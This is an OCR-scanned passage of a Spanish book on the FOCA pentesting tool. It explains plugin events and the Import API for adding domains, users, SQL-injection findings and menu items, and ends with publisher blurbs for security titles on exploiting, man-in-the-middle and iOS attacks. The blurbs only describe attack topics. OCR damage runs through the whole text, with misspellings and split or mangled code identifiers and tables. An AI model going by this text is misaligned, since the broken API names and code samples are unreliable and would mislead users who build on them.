El  resto  del  diseno  del  inierfaz  del  plugin  tendra  que  realizarse  en  funcion  dc  los  dalos  que  scran 
necesarios  visual izar  y/o  configurar,  y  es  decision  total  del  desarrollador  elegir  que,  donde  y  como 
ponerlo. 

Ah  ora,  para  dotar  de  sentido  la  creacion  de  un  plugin ,  hay  que  pensar  que  el  trabajo  siguiente  sera 
estableeer  un  canal  de  comunicacion  de  informacion  entre  am  bos,  utilizando  para  ello  los  eventos 
que  vamos  a  deseribir  a  continuacion.  Hay  que  decidir  que  informacion  se  quiere  obtener  de  FOCA 
para  hacer  algo  extra  y  que  informacion  debera  ser  enviada  desde  el  plugin  a  FOCA  para  ampliar  los 
datos  obtenidos  en  FOCA  y  por  tan  to  la  potencia  de  la  herramienta  a  la  hora  de  realizar  un  proeeso 
de  pen  testing  con  el  la. 
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Capturar  eventos 

Como  ya  se  ha  dicho,  los  eventos  que  genera  FOCA  perm  i ten  a  los  plugins  capturar  determinados 
mensajes  que  son  enviados  a  estos  para  obtener  informacion  directamente  desde  el  proyecto  que 
tiene  en  ejeeucion  FOCA.  Para  conseguir  capturar  esta  informacion,  primeramente  es  necesaria  la 
creacion  de  un  nuevo  metodo  de  tipo  "void1  en  la  clase  publica  "Plugin  que  se  vio  como  crear  al 
principio  de  este  capitulo,  que  debe  tener  como  nornbre  el  evento  en  concreto  que  se  quiere  capturar 
con  el  'Plugin. 

Entre  los  eventos  que  se  encuentran  disponibles  para  que  un  plugin  pueda  capturarlos  y  recibir 
informacion  del  proyecto  en  curso  dentro  de  FOCA  se  encuentran  los  siguientes  que  aparecen  en 
esta  tab! a: 


Imagen  06.12:  Eventos  disponibles  en  FOCA 


Como  se  puede  ver,  en  cad  a  evento  disparado  por  FOCA  va  asociada  la  informacion  relativa,  For 
ejemplo  con  un  nuevo  dominie  encontrado  se  envia  el  nombre  del  dominio  en  cuestiorc 
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Como  ejempio  sencillo  dc  plugin ?  a  continuation  sc  ve  una  captura  de  pantalla  donde  se  ve  la 
planti  I  la  capturando  los  dominios  agregados  median  te  el  evento  4  OnNewDomain ' .  Lo  unico  que 
hace  el  plugin  es  crear  un  metodo  11  am  ado  OnNewDomain  que  reel  be  como  para  metro  de  entrada 
el  nombre  del  nuevo  dominio.  Esos  datos  los  va  pintando  en  el  cuadro  de  dialogo  que  se  ve  en  la 
imagen  siguiente. 


Imagen  06.13:  Plugin  sencilJo  para  3a  captura  dc  nombres  de  dominios  encontrados  por  FOCA. 


Este plugin  es  hastante  sencillo  y  aparentemente  poco  praclico,  pero  podria  servir  como  ejempio  para 
obtener  muchas  utilidades.  Por  ejempio,  si  hubieraotros  sistemas  de  seguridad  en  la  organization,  u 
otras  herramientas  automatizadas  para  la  evaluation  de  los  activos  de  una  organization,  un  plugin  tan 
sencillo  como  el  deserito  podria  ser  creado  para  poder  enviar  a  una  base  de  datos  de  la  organization 
o  directamente  a  las  bases  de  datos  de  esas  herramientas  de  auditoria  y  seguridad  todo  lo  que  vaya 
deseubriendo  FOCA . 

Con  estos  eventos  el  desarrollador  de  un  plugin  ya  sabe  a  que  information  de  la  que  se  genera 
desde  FOCA  se  puede  suscribin  por  lo  que  podrian  hacerse  f'acilmente  integraciones  con  muchas 
herramientas  popu lares  como  namp ,  nessus ,  etcetera.  El  proceso  convertiria  a  la  FOCA  en  una 
solution  de  descubrimiento  de  activos  de  auditoria  para  el  lanzamiento  automatico  de  procesos  de 
auditoria  automat i  zados, 

Una  vez  que  ya  tiemos  visto  como  obtener  datos  de  FOCA  para  que  estos  lleguen  al  plugin  y  se 
hagan  eosas  con  el  los,  ahora  quedarfa  por  ver  como  se  puede  enviar  information  en  el  senlido 
inverse.  Es  deeir,  como  el  plugin*  una  vez  que  ha  procesado  toda  la  information,  es  capaz  de  meter 
information  que  se  una  al  proyeeto  de  auditoria  que  se  esta  realizando,  Esto  lo  vamos  a  ver  justo  en 
el  siguiente  apartado. 
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Importar  elementos  desde  el  plugin  a  la  FOCA 

Llegando  ya  a  ia  ultima  parte  del  proceso,  para  que  los  plugins  puedan  interactuar  eon  la  interfaz 
grafica  y  el  proyecto  en  eurso  de  FOCA ,  la  API  oferta  al  desarrollador  de  un  plugin  el  metodo 
Impo rtJmportE ventCaUerf  (Import Ob] ect)  i Object),  El  constructor  del  objeto  de  tipo  OmportOhject' 
recibe  dos  parametros  de  tipo  1  Import. Operation'  y  6 object'  con  la  siguiente  definicion: 

ImportObject  ( Import . Operation  operation,  object  o) ; 

Entre  las  operaciones  que  estan  disponibles  en  la  API  y  que  pueden  usarse  desde  cualquier  de  los 
plugins  que  se  creen  para  FOCA ,  se  encuentran  las  siguientes,  eon  sus  correspond  ientes  objetos  a 
importar  para  cada  tipo  de  operation. 


Operation 

Objecto(s)  a  importar 

As  soci at ionDomai n IP 

ImportElements , AssociationDomainIP 
{ 

string  domainj 

String  ip 

i 

AddDomain 

AddSQLi 

I 

string  domain 

Import Elements ■ AddSQlI 
{ 

string  urlj 

String  parameter 

> 

Import Elements .AddBackUp 
{ 

string  url 

> 

AddBackup 

AddO  ir  ee  to  ry  L  i  s  t  ing 

(No  imp Lemen to do ) 

Import  Element  s ,  Add  Directory  Listing 
{ 

string  url 

} 

AddDsStore 

(Afo  impiementodo) 

Import  Element  s  *  AddDs  Store 
{ 

string  url 

> 

AddGHDB 

Import  Element  s  *  AddGHDb 
{ 

string  url 

} 

AddlnsecureMethod 

(No  impiementodo) 

Import  E 1 e  me  nt  s . Ad  d I n  s  e  c  u r eHet  hod 

{ 

string  url, 
string  method 

} 

Imagen  06.14:  Operaciones  para  importar  datos  en  FOCA  desde  el  plugin. 
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1  Operation 

Objecto(s)  a  importar 

Add Leak 

(  No  imp  L  em  en  to  do  ) 

Import  Element  sTAddLealT 
{ 

string  urlj 
string  description 

> 

AddListing 

(No  impiementado) 

Import Elements .AddListing 
{ 

string  url 

> 

AddMultiplesChoice 

(No  impiementado) 

ImportElements . AddMultiplesChoice 
{ 

string  url 

> 

AddProxy 

(No  impiementado) 

Im  p  o  rt  E 1  e  me  nt  s  .  Ad  d  P  r  oxy 
{ 

string  urlj 
int  port 

> 

ImportElements . AddSvn 
{ 

string  url 

> 

ImportElements « AddUser 
{ 

string  domain j 
string  user 

AddSvn 

(No  impiementado) 

AddUser 

(No  impiementado) 

AddZorteT  ransf  er 

(No  impiementado) 

I 

ImportElements . Add ZoneTr an sfer 
{ 

string  ip 

> 

ImportElements . AsignRol 
( 

string  ip, 
string  rol 

> 

String  ip 

String  url 

AssignRol 

Add  IP 

AddURL 

I  mage  n  06.15:  Gperaeionones  para  importar  datos  en  FOCA  desdc  cl  plugin  (2a  parte). 


Por  ejemplo,  para  asignar  al  dominie  *  www.serverl.com'  una  Vulnerabilidad  do  tipo  SQL  injection 
en  la  Ur l  HTTP://www.serverl.com/focaplugin.a$px  sobre  el  parametro  Ucf  sc  podria  hacer  asi: 

Import-Object  iObject  =  new  ImportOb  j ect  ( 

Import .Operation . AddSQLi, 
new  Import-Elements  .  AddSQLI  ( 

"HTTP:  / / www  ,  serverl  .com/focaplugin,  aspx'%  ''id") 

)  ; 

Import , ImportEventCa Her  ^ iObject) ; 
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Para  terminar,  ademas  de  todas  esas  funciones,  existen  mas  para  importar  elementos  del  menu,  que 
puedes  ver  a  continuacion  en  las  siguienles  tablas,  como  manual  de  referenda: 


fmagen  06. 1 6:  Operaciones  para  importar  elementos  en  el  menu  de  FOCA  desde  el  plugin  (2a  parte). 
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Operation  Objecto{s)  a  importar 


AddContextMenu  Clements  .  Context ualMenu  -  ShowWetwor^Seru'ersItemMenu 

{ 

Too IStripMenu Item  menu 

> 

Elements  XontextualMenu. ShowNetworkSer^ersMenu 

{ 

ToolStripMenuItem  menu 

} 

Elements .  ContextualMenu  XhowNetworkUnlocatedlte^enu 

( 

ToolStripMenuItem  menu 

> 

Elements .  ContextualMenu .  ShowMetirarkUnlocated^enu 

{ 

ToolStripMenuItero  menu 

} 

Elements . Contextual Menu .ShowPro jectMenu 

{ 

ToolStripMenuItem  menu 

} 

E  lenient  s ,  ContextualMenu .  ShowftolesMenu 

{ 

ToolStripMenuItem  menu 

} 

Elements . Conte xtualMenu . SbowRolesfiolMenu 

{ 

ToolStripMenuItem  menu 

} 

Elements  . Contextu alMenu . ShowRolesRolftenuItem 

{ 

Tools  tripMenu  It  err  menu 

1 

Elements .ContextualMenu . ShouVulnerabilitiesKenu 

{ 

ToolStripMenuIteiT!  menu 

} 

Element  s .  Cent ext ualMenu .  ShowVulnerabil  itiesVulnerabi  1  it  ieMenu 

{ 

ToolStripMenuItem  menu 

> 

Elements  *  ContextualMenu  XbottfVulnerabilitiesVulnerabilitieMenuItem 

{ 

ToolStripMenuIteir-  menu, 

Elements -ContextualMenu .  key  Type  menu 

> 


Imagen  06. 17:  Qperaciones  para  importar  elementos  en  el  menu  de  FOCA  desde  el  plugin  (2a  parte). 
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3.  Final 

Si  has  leido  hasta  este  punto,  ya  sabes  tanto  como  los  que  creamos  la  FOCAy  y  seguro  que  eres 
capaz  de  saber  mas  de  ella  que  nosotros  mismos  si  amplias  sus  funeionalidades  con  nuevos plugins. 
El  numero  dc  fuentes  abiertas  que  hay  en  Internet  es  muy  grande,  el  numero  de  herramientas  eon 
las  que  puedes  integrar  FOCA  es  enorme  y  el  numero  de  nuevos  trucos  de  pentesting  que  van 
apareciendo  dia  a  dm  tiacen  que  esto  no  se  aeabe. 

Ya  sabes  manejar  la  FOCA  en  pro  fund  idad,  sabes  como  integrarla  eon  otras  herramientas,  y  sabes 
como  hacer  plugins  para  que  las  funeionalidades  sean  infinilas.  Es  tiempo  para  que  digas  eso  de: 
“Fear  the  FOCA” 
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til  DNJ  electronic*)  esta  entre  nosotros,  desde  haee  bastante  tiempo  pero, 
desgraciadamente,  el  uso  del  mis  mo  en  su  faceta  electronic  a  no  ha  despegado. 
Todavia  son  pocas  las  empresas  y  I  os  parti  cu  I  ares  que  saean  provecho  de  las 
fnncionalidades  que  ofrece.  En  este  libro  femes  Sarwat,  de  la  empresa  Smart  Ac  cess, 
desgrana  ios  fundamentos  tecnologicos  que  estan  tras  el,  y  muestra  como  utilizar  el 
DNI-e  cn  entomos  profesionales  v  particulars,  Desde  autenticarse  en  Ios  si  stem  as 
informal!  cos  de  una  empresa,  hasta  desarrollar  aplicaciones  que  saquen  partido  del 
DNI-e.  Rames  Sarwat  cs  licenciado  en  Inforniatica  por  la  Universidad  Politecnka 
de  Madrid  y  socio  fundador  y  director  de  Smart  Access*  Anteriormente  ejercio  como 
Director  de  Consult  aria  en  Microsoft.. 


Anuario  ilustrado  de  seguridad  informatica,  anecdotas  y  entrevistas  exclusivas+„ 
Casi  todo  lo  que  ha  ocurrido  en  seguridad  en  los  ultimos  doce  ahos,  esta  dentro  de 
"Una  al  dia:  12  ah  os  de  seguridad  informatica". 

Para  celebrar  los  doce  ah  os  ininterrumpidos  del  boletin  Una  al  dia ,  hem  os 
realizado  un  recorrido  por  toda  una  decada  de  virus,  vulnerabilidades,  fraudes, 
alertas,  v  reflexiones  sobre  la  seguridad  en  Internet  Desde  una  perspective  amen  a 
y  entretenida  y  con  un  disefto  sencillo  y  di  recto.  Los  12  ah  os  de  Una  al  dia 
sirven  de  excusa  para  un  libro  que  esta  compuesto  por  material  nuevo,  revisado  y 
redactado  desde  la  perspective  del  tiempo.  Ademas  de  las  entrevistas  exclusivas  y 
las  anecdotas  prop! as  de  Hispasec. 


La  informacidn  es  c  lave  en  la  preparation  de  un  test  de  penetration.  Sin  el  la 
no  es  posible  determ  mar  que  atacar  ni  como  hacerlo.  Y  los  bu  scad  ores  se  han 
convertido  en  herramientas  fundamentales  para  la  mineria  de  datos  y  los  procesos 
de  inteligeneia,  Sin  embargo,  pese  a  que  las  teenieas  de  Google  Hacking  lleven 
ahos  siendo  utilizadas,  quiza  no  hayan  sido  siernpre  bien  tratadas  ni  transmitidas 
al  publico.  Limitarse  a  emplcar  Google  Dorks  conocidos  o  a  usar  herramientas  que 
automaticen  esta  tarea  es,  con  respecto  al  uso  de  los  buscadores,  lo  mistno  que  usar 
una  herramienta  como  Nessus,  o  quiza  el  autopwn  de  Metasploit,  y  pensar  que  se 
esta  realizando  un  test  de  penetration.  Por  supuesto,  estas  herramientas  son  utiles, 
pero  se  debc  ir  mas  alia,  comprcndcr  los  problemas  encontrados,  ser  capaces  de 
detec  tar  otros  nuevos...  y  combinar  herramientas. 
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DesarroHe  de  apEicacianes  iQS 
para  iPhone  A  SPadr  Essentials 


No  es  dc  extranar  que  los  program  as  conteogan  tall  os,  err  ores,  que,  bajo 
determ  in  ad  as  circunstaneias  los  liagan  funcionar  de  forma  extrafla*  Que  los 
conviertan  en  algo  para  lo  que  no  estaban  disenados.  Aqui  es  donde  entran  en 
juego  los  posibles  atacantes.  Pent  esters,  audi  tores,  y  ciberdelincuentcs,  Para  la 
organization,  mejor  que  sea  uno  de  los  primeros  que  uno  de  los  ultimos.  Pero 
para  la  ap  I  icaci  on.  que  no  entra  en  valorar  in  Lend  ones,  no  hay  diferencia  entre 
cl  los,  Simplemente,  son  usuarios  que  hablan  un  extraho  idioma  en  que  los  errores 
se  denominan  “vulnerabilidadesA  y  una  aplicacion  defeeluosa  puede  terminar 
con  virtien dose,  por  ejemplo,  en  una  interfaz  de  usuario  que  1c  permita  interactuar 
di  recta  men!  e  eon  la  base  de  datos.  Y  bast  a  con  un  unico  error 


Las  redes  de  datos  IP  hace  mueho  tiempo  que  gobteman  nucstras  soeiedades. 
Empresas,  gobiemos  y  sistemas  de  interaction  social  se  basan  en  redes  TCP/IP. 
Sin  embargo,  estas  redes  tienen  vulnerabilidades  que  pueden  ser  aproveehadas 
por  un  atacante  para  robar  conlrasehas,  capturar  conversaciones  de  voz,  mensajes 
de  correo  electron  ieo  o  information  transmitida  desde  servidores,  En  este  libro  se 
analizan  como  funcionan  los  ataques  de  mart  in  the  middle  en  redes  IPv4  o  IPv6, 
c6mo  por  medio  de  estos  ataques  se  puede  crackear  una  eon  ex  ion  VPN  PPTP,  robar 
la  conexion  de  un  usuario  al  Active  Directory  o  como  suplantar  identifieadores  en 
aplicaciones  para  conseguir  perpetrar  una  intrusion  ademas  del  ataque  SLA  AC, 
el  funcionamiento  de  las  tecnicas  A  R P-Spoofing,  Neighbor  Spoofing  en  IPv6, 
etcetera. 

Hoy  dia  es  innegable  el  imparable  crecimiento  que  ban  tenido  las  lecnologias  de 
los  dispositivos  moviles  en  los  ultimos  aflos.  El  numero  de  smartphones,  tablets, 
etc.  han  aumentado  de  manera  exponential.  Esto  ha  sido  asi,  hasta  tal  punto  que 
actualmente  estos  dispositivos  se  han  posieionado  como  tcenologias  de  maxima 
priori  dad  para  much  as  empresas. 

Con  este  libro  se  pueden  adquirir  los  eonocimientos  necesarios  para  desarrollar 
aplicaciones  en  iOS,  guiando  al  lector  para  que  aprenda  a  utilizar  las  herramientas 
y  tecnicas  basic  as  para  iniciarse  en  el  mundo  iOS.  Se  pretendc  sen  tar  unas  bases,  de 
manera  que  al  fmalizar  la  lectura,  cl  lector  pueda  convertirse  en  desarrollador  iOS 
y  en  Trent  arse  a  proyectos  dc  este  si  stem  a  ope  rati  vo  por  si  mismo. 


Hoy  en  dia  la  admin istracidn  de  los  sistemas  es  de  vital  importancia  en  toda  empresa 
modern  a,  PowerS hell  ofrece  a  I  administrador  la  posibilidad  de  automatizar  las 
tareas  cotidianas  proporcionando  un  potente  lenguaje  de  scripting.  El  libro  esta 
estructurado  en  distintas  tematicas,  que  ofrcccn  al  lector  una  introduccton  a  la 
interned  on  con  la  potente  linea  de  comandos  de  Microsoft >  las  bases  y  pi  lares  para 
el  desarrollo  de  potentes  scripts  seguros,  y  la  gestion  de  productos  de  Microsoft 
desde  PowerShelL,  como  son  Hyper-  V,  Active  Directory \  Share  Point,  SQL  Server 
o  IIS ,  Otro  dc  los  aspectos  a  tratar  es  la  seguridad.  El  enfoque  practico  del  libro 
ayuda  al  administrador,  a  entender  los  distintos  y  variados  conceptos  que  ofrece 
PowerShelL 
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Microsoft  Windows  Server  20 / 2  ha  I  leg  ado  con  novedades  cuyo  objetivo  es 
simplificar  las,  cada  vez  mas,  complejas  tareas  de  ios  adm  inistradores  y  profesionaies 
IT.  En  el  presente  libro  se  recogen  la  gran  mayoria  de  dichas  novedades  entre  las 
que  destacan  la  version  3.0  de  Hyper-  Vt  el  servidor  de  virtualizacion  de  Microsoft, 
el  almacenamiento  con  su  nuevo  si  stem  a  de  archives  y  sus  propiedades,  las  mejoras 
y  nuevas  caracteristicas  de  Active  Directory,  DNS  y  DHCP,  las  novedosas  formulas 
de  despliegue  eficiente.  la  ampliation  y  me j ora  de  la  linea  de  comandos  Microsoft 
Windows  PowerSheil,  y  como  no,  la  seguridad,  un  pilar  basico  en  la  estructura  de 
los  productos  Microsoft  La  idea  del  libro  es  presentar  las  novedades  y  ahondar  en 
los  conceptos  principals . 


Metasploit 


La  seguridad  de  la  informaeidn  es  uno  de  los  mere  ad  os  en  auge  en  la  Informatica 
hoy  en  dta.  Los  gobiernos  y  empresas  valoran  sus  activos  por  lo  que  deben 
protegerlos  de  accesos  illcilos  mediante  el  uso  de  auditonas  que  proporcionen  un 
status  de  seguridad  a  mvcl  organizativo.  El  pen  testing  forma  parte  de  las  auditonas 
de  seguridad  y  proporeiona  un  conjunto  de  pruebas  que  valoren  el  estado  de  la 
seguridad  de  la  organization  en  eiertas  tases,  Metasploit  es  una  dc  las  herramientas 
mas  utilizadas  cn  procesos  de  pentesting  ya  que  contempla  distintas  fases  de  un 
test  de  intrusion.  Con  el  pre sente  libro  sc  pretende  obtener  una  vision  global  de  las 
fuses  en  las  que  Metasploit  puede  ofrecer  su  potencia  y  ftexibilidad  al  servicio  del 
hacking  etico. 


M]  cro  historias: 
an^cdotas  y  curiosldades 
de  la  Informatica 


^Sabias  que  Steve  Jobs  le  llevo  en  persona  un  ordenador  Macintosh  a  Yoko  Ono 
y  Lambien  a  Mick  J  agger?  que  Jay  Miner,  el  genio  que  creo  el  Amiga  1000 
tenia  una  perrita  que  tomaba  pane  en  algunas  de  las  dec  i  si  ones  de  disefio  de  este 
ordenador?  lO  que  Xenix  fue  el  si  sterna  Unix  mas  us  ado  en  los  80s  en  ordenadores 
y  que  era  propiedad  de  Microsoft! 

Estas  son  solo  algunas  de  las  historias  y  anecdotas  que  encontraras  en  este  libro  de 
Microhistorias.  Una  parte  importante  de  las  cuales  ticncn  como  protagonista  a  los 
miembros  de  Microsoft  y  de  Apple . 

50  historias  de  hackers,  phreakers,  programadores  y  disefi adores  euya  constancia 
y  sabiduria  nos  sirven  de  inspiration  y  de  ejemplo  para  nuestros  proyectos  de  hoy 
en  dia. 


Angel  Rios,  auditor  de  una  empresa  puntera  en  el  sector  dc  la  seguridad  informatica 
se  prepara  para  acudir  a  una  cita  con  Yolanda,  antigua  companera  de  clase  de  la  que 
siempre  ha  estado  enamorado.  Sin  embargo,  el  la  no  esta  interesada  en  iniciar  una 
relation;  solo  quiere  que  le  ayude  a  descifrar  un  misterioso  archivo.  Angel  se  ve 
envuelto  en  una  intriga  que  complieara  sli  vida  y  lo  expondra  a  un  grave  peligro* 
Unicamente  contara  con  sus  conocimientos  de  hacking  y  el  apoyo  de  su  amigo 
Marcos. 

Mezcla  de  novela  negra  y  manual  tecnieo,  este  libro  aspira  a  entretener  e  mformar 
a  partes  iguales  sobre  un  mundo  tan  apas ion ante  como  es  el  de  la  seguridad 
informatica.  Tecnicas  de  hacking  web ,  sistemas  y  analisis  forense,  son  algunos  de 
los  temas  que  se  tratan  con  total  rigor  y  excelentemente  documentados. 
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La  evolution  de  VoIP  ha  si  do  considerable,  siendo  hoy  dia  una  altemativa  muy 
utilizada  como  solution  unica  de  telefonta  en  muchi  simas  empresas.  Gracias  a  la 
expansion  de  Internet  y  a  las  redes  de  alta  velocidad.  llegara  un  momenta  en  el  que 
las  llneas  telefonicas  convencionales  scan  totalmcnte  sustituidas  por  sistemas  de 
VoIP,  dado  el  ahorro  econdmico  no  solo  en  llamadas  sino  tarn  hi  dn  en  infraestructura. 
El  gran  problemaes  la  falta  de concienciacion en  scguridad.  Las  empresas  aprenden 
de  los  errores  a  base  de  pagar  devadas  facturas  y  a  causa  de  sufrir  inlrusiones  en 
sus  sistemas. 

Este  libro  muestra  cdmo  hacer  un  test  de  penetration  en  un  sistema  de  VoIP  asi 
como  las  herramientas  mas  utilizadas  para  alaearlo,  repasando  ademas  los  fallos  de 
configuration  mas  comunes. 


/.Mas  pensado  alguna  vez  por  que  eono  el  informatieo  liene  siempre  esa  cara  de 
oreo?  t.Por  que  siempre  esta  enfadado?  ^Por  que  no  se  relaciona  con  la  gente  dc  la 
oficina? 

Yo  tc  lo  digo:  por  tu  culpa.  Por  vuestra  culpa.  Por  las  hurradas  que  hactis.  Porque 
no  os  podeis  estar  quietccitos,  no...  Porque  os  creels  que  el  informatieo  tiene  la 
solution  para  todo. 

Pas  a,  pasa,  y  enterate  de  que  pas  a  por  la  cabeza  de  Wardog,  un  administrador  de 
sistemas  renegado,  eon  afan  dc  venganza,  con  mat  dad  y  con  mala  h  ostia. 

Wardog  y  el  mundo  es  el  producto  de  anos  de  expos! cion  a  lasers  dotados  de 
estupidez  toxica,  de  mala  baba  destilada  y  acidez  de  estdmago,  Y  cafe  en  cantidadcs 
malsanas. 


Desarrollo  de  aplicaciones 
Android  seguras 


Actualmente,  el  mundo  de  las  aplicaciones  mdviles  cs  uno  de  los  sectores  que 
mas  dinero  tnueve  en  el  mercado  de  la  informatica.  Tener  conocimientos  de 
programacidn  en  estas  platafonnas  moviles  es  una  garantia  para  podcr  cncontrar 
empleo  a  dia  de  hoy.  “Desarrollo  de  aplicaciones  Android  seguras”  pretende 
meulcar  al  lector  una  base  sdlida  de  conocimientos  sobre  programacidn  en  la 
plataforma  movil  con  mayor  cuota  de  mercado  del  mundo:  Android.  Mediante  un 
enfoque  emmentemente  practice,  el  libro  guiara  al  lector  en  el  desarrollo  de  fas 
funcionalidades  mas  demandadas  a  la  hora  de  desarrollar  una  a  plica  cion  movil. 
Ademas  se  pretende  educar  al  programador  e  introducirle  en  la  utilization  dc 
tecnicas  de  diseno  que  modelen  aplicaciones  seguras,  en  la  parte  de  almacenamiento 
de  datos  y  en  la  parte  de  com unicaci ones. 


Este  libro  se  dedica  especialmente  a  dos  paradigm  as  dc  la  criptografia:  la  clasica 
y  RSA.  Ambos  los  trata  a  fondo  con  el  ammo  de  convert!  rse  en  uno  de  los 
documentor  m&s  completos  cn  csta  tematica.  Para  conseguir  este  trabajo  el  texto 
presentado  toma  como  referencia  trabajo  previo  de  los  autores,  complcmentandolo 
v  orientandolo  para  hacer  su  leetura  mas  asequible. 

El  teen i co  o  experto  en  seguridad  tendra  especial  intcres  por  el  sistema  RSA, 
antique  le  venga  muy  bien  recordar  sus  initios  en  La  criptografia  como  texto  de 
amen  a  leetura  y,  por  su  parte,  el  lector  no  experto  en  estos  tern  as  crip  toldgi  cos 
pero  si  interesado,  seguramente  Ic  atraiga  initialmente  la  criptografia  clasica  por  su 
sencillez  y  sentido  histdrieo. 
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Hardening  tfe  servi dares  GNU/Linux. 


gjVpp 


Este  libro  trata  sobre  la  seeurizacion  de  entumos  Linux  siguiendo  el  modelo  de 
Defensa  en  Profundidad,  Es  deci r,  diferenciando  la  infraestructura  en  diferentes 
capas  que  deberan  scr  conilguradas  de  forma  adecuada,  teniendo  eomo  principal 
objetivo  la  seguridad  global  que  proporcionaran.  Durante  el  transcurso  de  esta 
lectura  se  ofrecen  bases  tebricas,  ejemplos  de  con  figuracidn  y  funcionam lento T 
ademas  de  buenas  practicas  para  tratar  de  mantener  un  eniomo  lo  mas  seguro 
posible.  Sin  duda,  los  entomos  basados  en  Linux  offccen  una  gran  flexibilidad  y 
opciones,  por  lo  que  se  ha  optado  per  trabajar  con  las  teenologias  mas  comunes 
y  utilizadas.  En  defmitiva,  este  libro  se  recomienda  a  todos  aquellos  que  deseen 
reforzar  conceptos,  asi  eomo  para  los  que  nee  es!  ten  una  base  desde  la  que  partir  a 
la  hora  de  securizar  un  entorno  Linux. 


A  dia  de  hoy  se  ban  vend  id  o  mas  de  500  mi  Hones  de  dispositivos  iOS  y  aunque  la 
seguridad  del  si  stem  a  ha  mejorado  con  cada  version  todavia  se  pueden  encontrar 
vulnerabilidades  a  explolar.  Las  auditor! as  de  seguridad  en  empresas  cada  vez  se 
encuentran  eon  mas  dispositivos  iOS  entre  sus  objetivos,  ya  que  los  empleados  los 
utilizan  en  sus  puestos  de  trabajo,  lo  que  hace  que  haya  que  pensar  en  ellos  eomo 
posibles  riesgos  de  seguridad*  En  este  libro  se  han  junta  do  un  nutrido  grupo  de 
expertos  en  seguridad  en  la  materia  para  reeopilar  en  un  texto,  todas  las  formas 
de  aiacar  un  terminal  iPhone  o  iPad  de  un  usuario  detereminado.  I  ras  leer  este 
libro,  si  un  determinado  usuario  tiene  un  iPhone  o  un  iPad,  seguro  que  al  lector 
se  le  oeurren  muchas  formas  de  conseguir  la  informaeldn  que  en  el  se  guarde  o  de 
control  a r  lo  que  con  el  se  hace. 
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Kali  Linux  ha  renovado  el  espiritu  y  la  estabilidad  de  BackTrack  gracias  a  la 
agrupaeion  y  selection  de  hcrramientas  que  son  utilizadas  diariamente  por  miles 
de  auditores.  En  Kali  Linux  se  han  eliminado  las  hcrramientas  que  se  encontraban 
deseatalogadas  y  se  han  afinado  las  versiones  de  las  hcrramientas  top.  La  cantidad 
de  estas  es  lo  que  situa  a  Kali  Linux,  eomo  una  de  las  mejores  distribueiones  para 
auditor!  a  de  seguridad  del  mundo*  El  libro  pi  an  tea  un  enfoque  eminentemente 
practice,  priorizando  los  escenarios  reproducibles  por  el  lector,  y  ensefiando  el  uso 
de  las  hcrramientas  mas  utilizadas  en  el  mundo  de  la  auditoria  informatica.  Kali 
Linux  tiene  la  mision  de  suslituir  a  la  distribucibn  de  seguridad  por  exeelencia,  y 
eomo  se  puede  visualizar  en  este  libro  tiene  razones  sobradas  para  lograrlo. 


El  exploiting  es  el  arte  de  convertir  una  vulncrabilidad  o  breeha  de  seguridad 
en  una  entrada  real  hacia  un  sistema  ajeno.  Cuando  cientos  de  noticks  en  la  red 
hablan  sobre  stuna  posible  ejecueibn  de  codigo  arbitrario",  el  exploiter  es  aquella 
persona  capaz  de  desarrollar  todos  los  detalles  teen  i cos  y  complejos  elementos 
que  hacen  realidad  dieha  afirmacion.  El  objetivo  es  provocar,  a  traves  de  un  fallo 
de  programacion,  que  una  aplicacion  haga  cosas  para  las  que  inicialmente  no 
estaba  disehada,  pudiendo  tomar  asi  posterior  control  sobre  un  sistema.  Desde  la 
perspectiva  de  un  hacker  etico,  este  libro  le  brinda  todas  las  habilidades  necesarias 
para  adentrarse  en  el  mundo  del  exploiting  y  hacking  de  aplieaciones  en  el  sistema 
operative  Linux*  Conviertase  en  un  ninja  de  la  seguridad,  aprenda  el  Kung  Fu  de 
los  hackers. 


Le  herramienta  FOCA  es  una  utilidad  pensada  por  pentesters  que  hacen  pen¬ 
testing.  Esto  hace  que  la  herramienta  este  Mena  de  opciones  que  te  seran  de 
extremada  utilidad  si  vas  necesitas  hacer  una  auditoria  de  seguridad  a  un  sitio 
web  o  la  red  de  una  empresa.  FOCA  esta  basada  en  la  recoleccion  de  informa- 
cion  de  fuentes  abiertas  OSINT,  y  en  esta  ultima  version  se  ponen  a  disposi- 
cion  publics  todos  lo  plugins  y  funciones  que  tenia  la  version  PRO.  Ademas,  en 
esta  version,  es  posible  ampliar  la  funcionalidad  de  la  herramienta  y  extender 
las  habilidades  de  FOCA  mediante  la  creacion  de  plugins  personalizados. 

A  dia  de  hoy,  FOCA  es  una  popular  herramienta  en  el  mundo  de  la  seguridad 
usada  por  cientos  de  miles  profesionaies  a  lo  largo  del  mundo.  Ha  sido  citada 
en  cientos  de  conferencias  de  seguridad,  utilizada  para  hacer  estudios  de 
seguridad  por  hackers  en  todo  el  planeta.  Algunos  tan  famosos  como  el  propio 
Kevin  Mitnick  que  en  sus  conferencias  cuenta  como  sacar  el  maximo  de 
partido  a  esta  utilidad.  Si  te  gusta  el  mundo  de  la  seguridad  informatica,  el 
hacking  o  el  pentesting  en  general,  debes  conocer  como  sacarle  el  maximo 
partido  a  tu  FOCA. 

En  este  libro  aprenderas  a  sacar  partido  de  todas  las  funciones  que  tiene 
FOCA,  asi  como  utilizarla  junto  con  otras  herramientas  como  Burp,  Metasploit 
o  los  frameworks  de  Evil  Grade.  Tambien  veras  como  utilizar  la  informacion 
obtenida  con  FOCA  en  diferentes  esquemas  de  ataque  a  utilizar  en  un  pentes¬ 
ting.  Conoceras  como  funciona  la  fase  de  analisis  de  metadatos,  las  herra¬ 
mientas  de  descubrimiento  de  red,  las  tecnicas  de  fingerprintig  y  la  busqueda 
de  vulnerabitidades.  Fear  the  FOCA! 
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